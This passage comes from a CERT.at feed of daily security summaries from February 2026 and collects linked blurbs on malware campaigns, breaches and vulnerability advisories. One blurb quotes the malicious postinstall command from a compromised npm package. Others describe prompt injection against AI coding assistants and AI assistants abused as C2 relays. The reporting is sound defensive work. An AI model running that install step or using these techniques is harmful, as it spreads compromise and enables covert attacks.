Agent Tesla remains one of the most persistent threats in the cyber landscape today. It allows even low-skilled threat actors to harvest sensitive data through a highly sophisticated delivery pipeline. This research blog breaks down a recent multi-stage infection chain that utilizes a blend of phishing, obfuscated and encrypted scripts, and advanced in-memory execution and evasion techniques.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.fortinet.com/blog/threat-research/unmasking-agent-tesla-deep-dive-into-multi-stage-campaign&quot;&gt;https://www.fortinet.com/blog/threat-research/unmasking-agent-tesla-deep-dive-into-multi-stage-campaign&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;CVE-2025-59201 - Network Connection Status Indicator (NCSI) EoP&lt;/h3&gt;

It's been a while since I last dug into a Patch Tuesday release. With an extraordinarily high number of 177 CVEs, including 6 that were either already public or exploited in the wild, the October 2025 one seemed like a good opportunity to get back at it. The one I ended up investigating in depth was CVE-2025-59201, an elevation of privilege in the &quot;Network Connection Status Indicator&quot;.
&lt;p /&gt;
&lt;A HREF=&quot;https://itm4n.github.io/cve-2025-59201-ncsi-eop/&quot;&gt;https://itm4n.github.io/cve-2025-59201-ncsi-eop/&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Cisco Catalyst SD-WAN Vulnerabilities&lt;/h3&gt;

Multiple vulnerabilities in Cisco Catalyst SD-WAN Manager, formerly SD-WAN vManage, could allow an attacker to access an affected system, elevate privileges to root, gain access to sensitive information, and overwrite arbitrary files. For more information about these vulnerabilities, see the Details section of this advisory. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at
&lt;p /&gt;
&lt;A HREF=&quot;https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-authbp-qwCX8D4v&quot;&gt;https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-authbp-qwCX8D4v&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;CISA and Partners Release Guidance for Ongoing Global Exploitation of Cisco SD-WAN Systems&lt;/h3&gt;

The purpose of this Alert is to provide resources for organizations with Cisco Software-Defined Wide-Area Networking (SD-WAN) systems, including Federal Civilian Executive Branch (FCEB) agencies, to address ongoing exploitation of multiple vulnerabilities. Notably, the Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2026-20127 and CVE-2022-20775 to its Known Exploited Vulnerabilities (KEV) Catalog on Feb. 25, 2026.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/alerts/2026/02/25/cisa-and-partners-release-guidance-ongoing-global-exploitation-cisco-sd-wan-systems&quot;&gt;https://www.cisa.gov/news-events/alerts/2026/02/25/cisa-and-partners-release-guidance-ongoing-global-exploitation-cisco-sd-wan-systems&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Zyxel warns of critical RCE flaw affecting over a dozen routers&lt;/h3&gt;

Taiwan networking provider Zyxel has released security updates to address a critical vulnerability affecting over a dozen router models that can allow unauthenticated attackers to gain remote command execution on unpatched devices.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/zyxel-warns-of-critical-rce-flaw-affecting-over-a-dozen-routers/&quot;&gt;https://www.bleepingcomputer.com/news/security/zyxel-warns-of-critical-rce-flaw-affecting-over-a-dozen-routers/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Malicious code vulnerabilities closed in Dell Repository Manager, Wyse Management Suite&lt;/h3&gt;

Dell's remote management tools Repository Manager and Wyse Management Suite are vulnerable. Security updates close several vulnerabilities.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Schadcode-Luecken-in-Dell-Repository-Manager-Wyse-Management-Suite-geschlossen-11188796.html&quot;&gt;https://www.heise.de/news/Schadcode-Luecken-in-Dell-Repository-Manager-Wyse-Management-Suite-geschlossen-11188796.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Drupal UI Icons - Critical - Cross-site Scripting - SA-CONTRIB-2026-010&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.drupal.org/sa-contrib-2026-010&quot;&gt;https://www.drupal.org/sa-contrib-2026-010&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;LWN: Security updates for Wednesday&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1060185/&quot;&gt;https://lwn.net/Articles/1060185/&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-02-25T19:43:02Z</dc:date></entry><entry><title>Daily summary - 24.02.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/2/tagesberichte-24022026"/><author><name>CERT.at</name></author><updated>2026-02-24T18:08:06Z</updated><published>2026-02-24T18:08:06Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Monday 23-02-2026 18:00 - Tuesday 24-02-2026 18:00
Handler:     Guenes Holler
Co-Handler:  n/a


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Disovery is not the bottleneck!&lt;/h3&gt;

There is a seductive logic to the current surge of optimism around AI-supported vulnerability discovery - a logic that is entirely based on a fundamental misunderstanding of the situation at hand.
&lt;p /&gt;
&lt;A HREF=&quot;https://bytesandborscht.com/disovery-is-not-the-bottleneck/&quot;&gt;https://bytesandborscht.com/disovery-is-not-the-bottleneck/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Microsoft ends support for Windows versions from 2016&lt;/h3&gt;

Windows versions from 2016 will shortly no longer receive support. Extended Security Updates (ESU) are, however, being planned.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Microsoft-beendet-Unterstuetzung-fuer-Windows-Versionen-aus-2016-11187147.html&quot;&gt;https://www.heise.de/news/Microsoft-beendet-Unterstuetzung-fuer-Windows-Versionen-aus-2016-11187147.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;FinanzOnline phishing: crypto and company data in the crosshairs&lt;/h3&gt;

A new variant of the classic phishing scam in the name of the Ministry of Finance is making the rounds. In addition to the usual address and bank data, it targets further sensitive information. Criminals want to find out everything about their victims' possible crypto holdings and additionally ask about any company details.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.watchlist-internet.at/news/finanzonline-phishing-krypto-unternehmensdaten/&quot;&gt;https://www.watchlist-internet.at/news/finanzonline-phishing-krypto-unternehmensdaten/&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;40 security vulnerabilities closed in ImageMagick&lt;/h3&gt;

The image editing software ImageMagick is vulnerable in several places. Security patches are available for installation.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11186935&quot;&gt;https://heise.de/-11186935&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Critical SolarWinds Serv-U flaws offer root access to servers&lt;/h3&gt;

SolarWinds has released security updates to patch four critical Serv-U remote code execution vulnerabilities that could grant attackers root access to unpatched servers.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/critical-solarwinds-serv-u-flaws-offer-root-access-to-servers/&quot;&gt;https://www.bleepingcomputer.com/news/security/critical-solarwinds-serv-u-flaws-offer-root-access-to-servers/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;LWN Security updates for Tuesday&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1060018/&quot;&gt;https://lwn.net/Articles/1060018/&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-02-24T18:08:06Z</dc:date></entry><entry><title>Daily summary - 23.02.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/2/tagesberichte-23022026"/><author><name>CERT.at</name></author><updated>2026-02-23T19:13:23Z</updated><published>2026-02-23T19:13:23Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Friday 20-02-2026 18:00 - Monday 23-02-2026 18:00
Handler:     Guenes Holler
Co-Handler:  Michael Schlagenhaufer


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Incident Reporting: EU-Wide Statistics&lt;/h3&gt;

At the last CSIRTs Network meeting we got treated to a PowerPoint version of the statistics that ENISA publishes under https://ciras.enisa.europa.eu/ The mathematician inside me was not impressed, and as I'm prone to do, I did not withhold my opinion. This blog post explains why I'm so unhappy with ENISA's analysis.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cert.at/en/blog/2026/2/incident-reporting-eu-wide-statistics&quot;&gt;https://www.cert.at/en/blog/2026/2/incident-reporting-eu-wide-statistics&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Predator spyware hooks iOS SpringBoard to hide mic, camera activity&lt;/h3&gt;

US-sanctioned surveillance firm Intellexa developed the Predator commercial spyware and delivered it in attacks that exploited Apple and Chrome zero-day flaws and through 0-click infection mechanisms. [..] The malware does not exploit any iOS vulnerability but leverages previously obtained kernel-level access to hijack system indicators that would otherwise expose its surveillance operation.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/predator-spyware-hooks-ios-springboard-to-hide-mic-camera-activity/&quot;&gt;https://www.bleepingcomputer.com/news/security/predator-spyware-hooks-ios-springboard-to-hide-mic-camera-activity/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Amazon: AI-assisted hacker breached 600 Fortinet firewalls in 5 weeks&lt;/h3&gt;

A new report by CJ Moses, CISO of Amazon Integrated Security, says that the hacking campaign occurred between January 11 and February 18, 2026, and did not rely on any exploits to breach Fortinet firewalls. Instead, the threat actor targeted exposed management interfaces and weak credentials that lacked MFA protection, then used AI to help automate access to other devices on the breached network.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/amazon-ai-assisted-hacker-breached-600-fortigate-firewalls-in-5-weeks/&quot;&gt;https://www.bleepingcomputer.com/news/security/amazon-ai-assisted-hacker-breached-600-fortigate-firewalls-in-5-weeks/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;CarGurus: Have I Been Pwned integrates data of 12.5 million customers&lt;/h3&gt;

Have I Been Pwned has grown by 12.5 million entries of CarGurus users. They were stolen by ShinyHunters. [..] Also included are user account IDs, data from financial pre-checks, dealer accounts and subscription information. Hunt further explains that names, phone numbers, addresses and IP addresses as well as the outcome of financing requests are also affected.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/CarGurus-ShinyHunters-kopieren-Datensaetze-von-12-5-Millionen-Nutzern-11185847.html&quot;&gt;https://www.heise.de/news/CarGurus-ShinyHunters-kopieren-Datensaetze-von-12-5-Millionen-Nutzern-11185847.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;&quot;Starkiller&quot; Phishing Service Proxies Real Login Pages, MFA&lt;/h3&gt;

Most phishing websites are little more than static copies of login pages for popular online destinations, and they are often quickly taken down by anti-abuse activists and security firms. But a stealthy new phishing-as-a-service offering lets customers sidestep both of these pitfalls: It uses cleverly disguised links to load the target brand's real website, and then acts as a relay between the victim and the legitimate site - forwarding the victim's username, password and multi-factor authentication (MFA) code to the legitimate site and returning its responses.
&lt;p /&gt;
&lt;A HREF=&quot;https://krebsonsecurity.com/2026/02/starkiller-phishing-service-proxies-real-login-pages-mfa/&quot;&gt;https://krebsonsecurity.com/2026/02/starkiller-phishing-service-proxies-real-login-pages-mfa/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Hackers Hide Pulsar RAT Inside PNG Images in New NPM Supply Chain Attack&lt;/h3&gt;

Cybersecurity researchers at Veracode reveal a typosquatting attack that disguises Pulsar RAT as images to bypass Windows security and antivirus programs.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/hackers-pulsar-rat-png-images-npm-supply-chain-attack/&quot;&gt;https://hackread.com/hackers-pulsar-rat-png-images-npm-supply-chain-attack/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Roundcube Webmail: attacks on security vulnerabilities under way&lt;/h3&gt;

The second vulnerability became known shortly before Christmas. It enables cross-site scripting attacks. The flaw affects the processing of the &quot;animate&quot; tag in SVG files. [..] IT managers should secure their systems by installing at least the fixed versions 1.5.12 and 1.6.12.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11185535&quot;&gt;https://heise.de/-11185535&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;SANDWORM_MODE: Shai-Hulud-Style npm Worm Hijacks CI Workflows and Poisons AI Toolchains&lt;/h3&gt;

An active Shai-Hulud-like supply chain worm campaign spreads via typosquatting and AI toolchain poisoning, across at least 19 malicious npm packages and linked to two npm aliases. The sample retains Shai-Hulud hallmarks and adds GitHub API exfiltration with DNS fallback, hook-based persistence, SSH propagation fallback, MCP server injection with embedded prompt injection targeting AI coding assistants, and LLM API Key harvesting.
&lt;p /&gt;
&lt;A HREF=&quot;https://socket.dev/blog/sandworm-mode-npm-worm-ai-toolchain-poisoning&quot;&gt;https://socket.dev/blog/sandworm-mode-npm-worm-ai-toolchain-poisoning&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Pi-hole: update closes security vulnerabilities and delivers more performance&lt;/h3&gt;

On the one hand, attackers logged in as admin could have abused a &quot;stored HTML injection&quot; vulnerability to inject HTML code that is rendered when the DNS records table is displayed (CVE-2026-26952, CVSS 5.4, risk &quot;medium&quot;). On the other hand, the same is possible on the API settings page (CVE-2026-26953, CVSS 5.4, risk &quot;medium&quot;).
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11185637&quot;&gt;https://heise.de/-11185637&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;LWN: Security updates for Monday&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1059864/&quot;&gt;https://lwn.net/Articles/1059864/&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-02-23T19:13:23Z</dc:date></entry><entry><title>Daily summary - 20.02.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/2/tagesberichte-20022026"/><author><name>CERT.at</name></author><updated>2026-02-20T18:41:34Z</updated><published>2026-02-20T18:41:34Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Thursday 19-02-2026 18:00 - Friday 20-02-2026 18:00
Handler:     Guenes Holler
Co-Handler:  n/a


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;ClickFix Campaign Abuses Compromised Sites to Deploy MIMICRAT RAT&lt;/h3&gt;

Cybersecurity researchers have disclosed details of a new ClickFix campaign that abuses compromised legitimate sites to deliver a previously undocumented remote access trojan (RAT) called MIMICRAT (aka AstarionRAT).
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/02/clickfix-campaign-abuses-compromised.html&quot;&gt;https://thehackernews.com/2026/02/clickfix-campaign-abuses-compromised.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;PromptSpy ushers in the era of GenAI-powered Android threats&lt;/h3&gt;

ESET researchers discover PromptSpy, the first known Android malware that uses generative AI in its execution flow.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.welivesecurity.com/de/eset-research/promptspy-lautet-mit-genai-die-ara-der-android-bedrohungen-ein/&quot;&gt;https://www.welivesecurity.com/de/eset-research/promptspy-lautet-mit-genai-die-ara-der-android-bedrohungen-ein/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Windows Notepad: details on the Markdown security vulnerability&lt;/h3&gt;

The Patch Tuesday updates close a hole in Windows Notepad that allows malicious code to be injected. Details on the flaw are now available.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11183516&quot;&gt;https://heise.de/-11183516&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Crims create fake remote management vendor that actually sells a RAT&lt;/h3&gt;

Researchers at Proofpoint late last month uncovered what they describe as a &quot;weird twist&quot; on the growing trend of criminals abusing remote monitoring and management software (RMM) as their preferred attack tools.
&lt;p /&gt;
&lt;A HREF=&quot;https://go.theregister.com/feed/www.theregister.com/2026/02/19/rmm_rat_trustconnect/&quot;&gt;https://go.theregister.com/feed/www.theregister.com/2026/02/19/rmm_rat_trustconnect/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;VShell and SparkRAT Observed in Exploitation of BeyondTrust Critical Vulnerability (CVE-2026-1731)&lt;/h3&gt;

On Feb. 6, 2026, BeyondTrust released a security advisory regarding CVE-2026-1731. BeyondTrust is an identity and access management platform. This specific vulnerability involves a pre-authentication remote code execution (RCE) issue within BeyondTrust remote support software. It could allow attackers to execute operating system commands in the context of the site user, which may lead to system compromise, including unauthorized access, data exfiltration and service disruption.
&lt;p /&gt;
&lt;A HREF=&quot;https://unit42.paloaltonetworks.com/beyondtrust-cve-2026-1731/&quot;&gt;https://unit42.paloaltonetworks.com/beyondtrust-cve-2026-1731/&lt;/a&gt;

&lt;hr&gt;

&lt;h2&gt; Vulnerabilities &lt;/h2&gt;



&lt;h3&gt;Atlassian security updates: Bamboo and Confluence are vulnerable&lt;/h3&gt;

To prevent attackers from exploiting several security vulnerabilities in Atlassian Bamboo Data Center and Server, Confluence Data Center and Server, and Crowd Data Center and Server, admins should install the now available patches promptly.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11183534&quot;&gt;https://heise.de/-11183534&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Numerous kernel vulnerabilities closed in Dell PowerProtect Data Manager&lt;/h3&gt;

Dell's backup solution PowerProtect Data Manager is vulnerable to, among other things, malicious code attacks. Security patches are available for download.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11184164&quot;&gt;https://heise.de/-11184164&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;LWN Security updates for Friday&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1059638/&quot;&gt;https://lwn.net/Articles/1059638/&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-02-20T18:41:34Z</dc:date></entry><entry><title>Daily summary - 19.02.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/2/tagesberichte-19022026"/><author><name>CERT.at</name></author><updated>2026-02-19T19:17:58Z</updated><published>2026-02-19T19:17:58Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Wednesday 18-02-2026 18:00 - Thursday 19-02-2026 18:00
Handler:     Guenes Holler
Co-Handler:  Felician Fuchs


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Lawful access to encrypted data: General Considerations&lt;/h3&gt;

Last week, I wrote a blog post on why the problem of lawful access to encrypted data is so tricky; this week I want to continue with a discussion on the general considerations you should keep in mind when thinking about this topic. Important note: I think LE is well aware of these considerations and agrees with most of my conclusions.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cert.at/en/blog/2026/2/lawful-access-to-encrypted-data-general-considerations&quot;&gt;https://www.cert.at/en/blog/2026/2/lawful-access-to-encrypted-data-general-considerations&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Hackers target Microsoft Entra accounts in device code vishing attacks&lt;/h3&gt;

Threat actors are targeting technology, manufacturing, and financial organizations in campaigns that combine device code phishing and voice phishing (vishing) to abuse the OAuth 2.0 Device Authorization flow and compromise Microsoft Entra accounts.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/hackers-target-microsoft-entra-accounts-in-device-code-vishing-attacks/&quot;&gt;https://www.bleepingcomputer.com/news/security/hackers-target-microsoft-entra-accounts-in-device-code-vishing-attacks/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;How infostealers turn stolen credentials into real identities&lt;/h3&gt;

Infostealer dumps increasingly tie stolen credentials to real identities, linking usernames, cookies, and behavior across personal and enterprise accounts. Specops explains how analyzing 90,000 dumps shows reuse fuels enterprise risk and how continuous AD scanning disrupts that cycle.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/how-infostealers-turn-stolen-credentials-into-real-identities/&quot;&gt;https://www.bleepingcomputer.com/news/security/how-infostealers-turn-stolen-credentials-into-real-identities/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Arkanix Stealer: a C++ &amp; Python infostealer&lt;/h3&gt;

Kaspersky researchers analyze a C++ and Python stealer dubbed &quot;Arkanix Stealer&quot;, which was active for several months, targeted a wide range of data, was distributed as MaaS and offered a referral program to its partners.
&lt;p /&gt;
&lt;A HREF=&quot;https://securelist.com/arkanix-stealer/119006/&quot;&gt;https://securelist.com/arkanix-stealer/119006/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;France: attackers accessed data on 1.2 million bank accounts&lt;/h3&gt;

In France, attackers gained access to a national database and read out data on 1.2 million bank accounts.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Frankreich-Angreifer-griffen-auf-Daten-von-1-2-Millionen-Bankkonten-zu-11182323.html&quot;&gt;https://www.heise.de/news/Frankreich-Angreifer-griffen-auf-Daten-von-1-2-Millionen-Bankkonten-zu-11182323.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;The clock is ticking: deadline for NIS2 registration with the BSI expires on 6 March 2026&lt;/h3&gt;

TÜV SÜD warns that the registration deadline with the BSI for companies subject to NIS2 ends in two weeks. Around 29,000 German companies are affected.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Die-Uhr-tickt-Frist-zur-NIS2-Registrierung-beim-BSI-laeuft-am-6-Maerz-2026-ab-11182499.html&quot;&gt;https://www.heise.de/news/Die-Uhr-tickt-Frist-zur-NIS2-Registrierung-beim-BSI-laeuft-am-6-Maerz-2026-ab-11182499.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Scam: fake &quot;Gemini&quot; chatbots sell a fake &quot;Google Coin&quot;&lt;/h3&gt;

A new scam relies on customized AI chatbots. These push victims into buying worthless cryptocurrencies.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Betrugsmasche-Falsche-Gemini-Chatbots-verkaufen-falschen-Google-Coin-11182685.html&quot;&gt;https://www.heise.de/news/Betrugsmasche-Falsche-Gemini-Chatbots-verkaufen-falschen-Google-Coin-11182685.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Kubernetes project issues warning on Ingress NGINX retirement&lt;/h3&gt;

The Kubernetes project is urging organizations to migrate away from Ingress NGINX before its retirement in March 2026, with new high-severity CVEs underscoring the urgency.
&lt;p /&gt;
&lt;A HREF=&quot;https://securitylabs.datadoghq.com/articles/kubernetes-ingress-nginx-retirement-warning/&quot;&gt;https://securitylabs.datadoghq.com/articles/kubernetes-ingress-nginx-retirement-warning/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Cline CLI npm Package Compromised via Suspected Cache Poisoning Attack&lt;/h3&gt;

On February 17, 2026, an unauthorized party used a compromised npm publish token to push cline@2.3.0 to the npm registry. Cline is a popular AI coding agent CLI in the developer ecosystem, with around 90,000 weekly downloads from npm. The malicious version contained a modified package.json with an added postinstall script: npm install -g openclaw@latest.
&lt;p /&gt;
&lt;A HREF=&quot;https://socket.dev/blog/cline-cli-npm-package-compromised-via-suspected-cache-poisoning-attack&quot;&gt;https://socket.dev/blog/cline-cli-npm-package-compromised-via-suspected-cache-poisoning-attack&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Critical infra Honeywell CCTVs vulnerable to auth bypass flaw&lt;/h3&gt;

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning of a critical vulnerability in multiple Honeywell CCTV products that allows unauthorized access to feeds or account hijacking.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/critical-infra-honeywell-cctvs-vulnerable-to-auth-bypass-flaw/&quot;&gt;https://www.bleepingcomputer.com/news/security/critical-infra-honeywell-cctvs-vulnerable-to-auth-bypass-flaw/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Grandstream GXP1600 VoIP Phones Exposed to Unauthenticated Remote Code Execution&lt;/h3&gt;

Cybersecurity researchers have disclosed a critical security flaw in the Grandstream GXP1600 series of VoIP phones that could allow an attacker to seize control of susceptible devices. The vulnerability, tracked as CVE-2026-2329, carries a CVSS score of 9.3 out of a maximum of 10.0.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/02/grandstream-gxp1600-voip-phones-exposed.html&quot;&gt;https://thehackernews.com/2026/02/grandstream-gxp1600-voip-phones-exposed.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Nvidia AI tools Megatron Bridge and NeMo Framework as a gateway for attackers&lt;/h3&gt;

Nvidia's developers have closed, among other things, malicious code loopholes in Megatron Bridge and NeMo Framework.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Nvidia-KI-Tools-Megatron-Bridge-und-NeMo-Framework-als-Einfallstor-fuer-Angreifer-11182013.html&quot;&gt;https://www.heise.de/news/Nvidia-KI-Tools-Megatron-Bridge-und-NeMo-Framework-als-Einfallstor-fuer-Angreifer-11182013.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Mozilla Firefox Issues Emergency Patch for Heap Buffer Overflow in Firefox v147&lt;/h3&gt;

Mozilla has released an out-of-band security update to address a critical vulnerability affecting its browser. The update, issued as Firefox v147.0.4, resolves a high-impact heap buffer overflow flaw in the libvpx video codec library. The issue is tracked under CVE-2026-2447 and was identified by security researcher jayjayjazz.
&lt;p /&gt;
&lt;A HREF=&quot;https://thecyberexpress.com/firefox-v147-cve-2026-2447/&quot;&gt;https://thecyberexpress.com/firefox-v147-cve-2026-2447/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;LWN Security updates for Thursday&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1059500/&quot;&gt;https://lwn.net/Articles/1059500/&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-02-19T19:17:58Z</dc:date></entry><entry><title>Daily summary - 18.02.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/2/tagesberichte-18022026"/><author><name>CERT.at</name></author><updated>2026-02-18T18:25:57Z</updated><published>2026-02-18T18:25:57Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Tuesday 17-02-2026 18:00 - Wednesday 18-02-2026 18:00
Handler:     Guenes Holler
Co-Handler:  Michael Schlagenhaufer


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Data breach at fintech firm Figure affects nearly 1 million accounts&lt;/h3&gt;

Hackers have stolen the personal and contact information of nearly 1 million accounts after breaching the systems of Figure Technology Solutions, a self-described blockchain-native financial technology company.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/data-breach-at-fintech-firm-figure-affects-nearly-1-million-accounts/&quot;&gt;https://www.bleepingcomputer.com/news/security/data-breach-at-fintech-firm-figure-affects-nearly-1-million-accounts/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Microsoft: Anti-phishing rules mistakenly blocked emails, Teams messages&lt;/h3&gt;

Microsoft says an Exchange Online issue that mistakenly quarantined legitimate emails last week was triggered by faulty heuristic detection rules designed to block credential phishing campaigns.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/microsoft/microsoft-anti-phishing-rules-mistakenly-blocked-emails-teams-messages/&quot;&gt;https://www.bleepingcomputer.com/news/microsoft/microsoft-anti-phishing-rules-mistakenly-blocked-emails-teams-messages/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;&quot;Not an everyday dimension&quot;: AWS cannot fend off DDoS attack on Deutsche Bahn&lt;/h3&gt;

For a whole day, hackers managed to take down the DB Navigator and bahn.de. The business-critical systems are hosted at Amazon Web Services.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/die-groessere-kante-aws-kann-ddos-attacke-auf-die-bahn-nicht-abfangen-2602-205569.html&quot;&gt;https://www.golem.de/news/die-groessere-kante-aws-kann-ddos-attacke-auf-die-bahn-nicht-abfangen-2602-205569.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Researchers Show Copilot and Grok Can Be Abused as Malware C2 Proxies&lt;/h3&gt;

Cybersecurity researchers have disclosed that artificial intelligence (AI) assistants that support web browsing or URL fetching capabilities can be turned into stealthy command-and-control (C2) relays, a technique that could allow attackers to blend into legitimate enterprise communications and evade detection.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/02/researchers-show-copilot-and-grok-can.html&quot;&gt;https://thehackernews.com/2026/02/researchers-show-copilot-and-grok-can.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Your AI-generated password isn't random, it just looks that way&lt;/h3&gt;

Seemingly complex strings are actually highly predictable, crackable within hours. Generative AI tools are surprisingly poor at suggesting strong passwords, experts say.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.theregister.com/2026/02/18/generating_passwords_with_llms/&quot;&gt;https://www.theregister.com/2026/02/18/generating_passwords_with_llms/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Red Vulns Rising: Examining Chinese National Vulnerability Databases&lt;/h3&gt;

Learn how the Chinese vulnerability databases (CNVD and CNNVD) compare to CVE, including early disclosures, policy shifts, and data quality differences.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bitsight.com/blog/chinese-vulnerability-database-analysis-cnvd-cnnvd&quot;&gt;https://www.bitsight.com/blog/chinese-vulnerability-database-analysis-cnvd-cnnvd&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


